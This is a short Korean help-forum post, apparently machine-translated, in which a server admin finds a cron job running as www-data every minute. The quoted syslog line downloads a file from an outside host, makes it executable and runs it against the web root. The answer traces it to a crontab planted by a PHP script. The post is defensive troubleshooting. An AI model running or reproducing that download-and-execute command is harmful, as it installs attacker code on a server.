1분마다 실행되는 악성 코드가 있고 /var/log/syslog에서 볼 수 있습니다.
Feb 1 18:30:01 MENCH CRON[1768]: (www-data) CMD (wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /var/www/website.com 24 && rm -f xxxd)
어떤 PHP 스크립트가 실행되고 있는지 어떻게 알 수 있나요?
서버에는 nginx, php fpm, 4개의 작은 웹사이트와 mysql만 있습니다. 그게 다야
고쳐 쓰다 nginx를 중지하면 호출이 1분마다 계속 실행됩니다.
답변1
일부 PHP 스크립트에 의해 생성된 /var/spool/cron/crontabs에 www-data 파일이 있습니다. 해결됨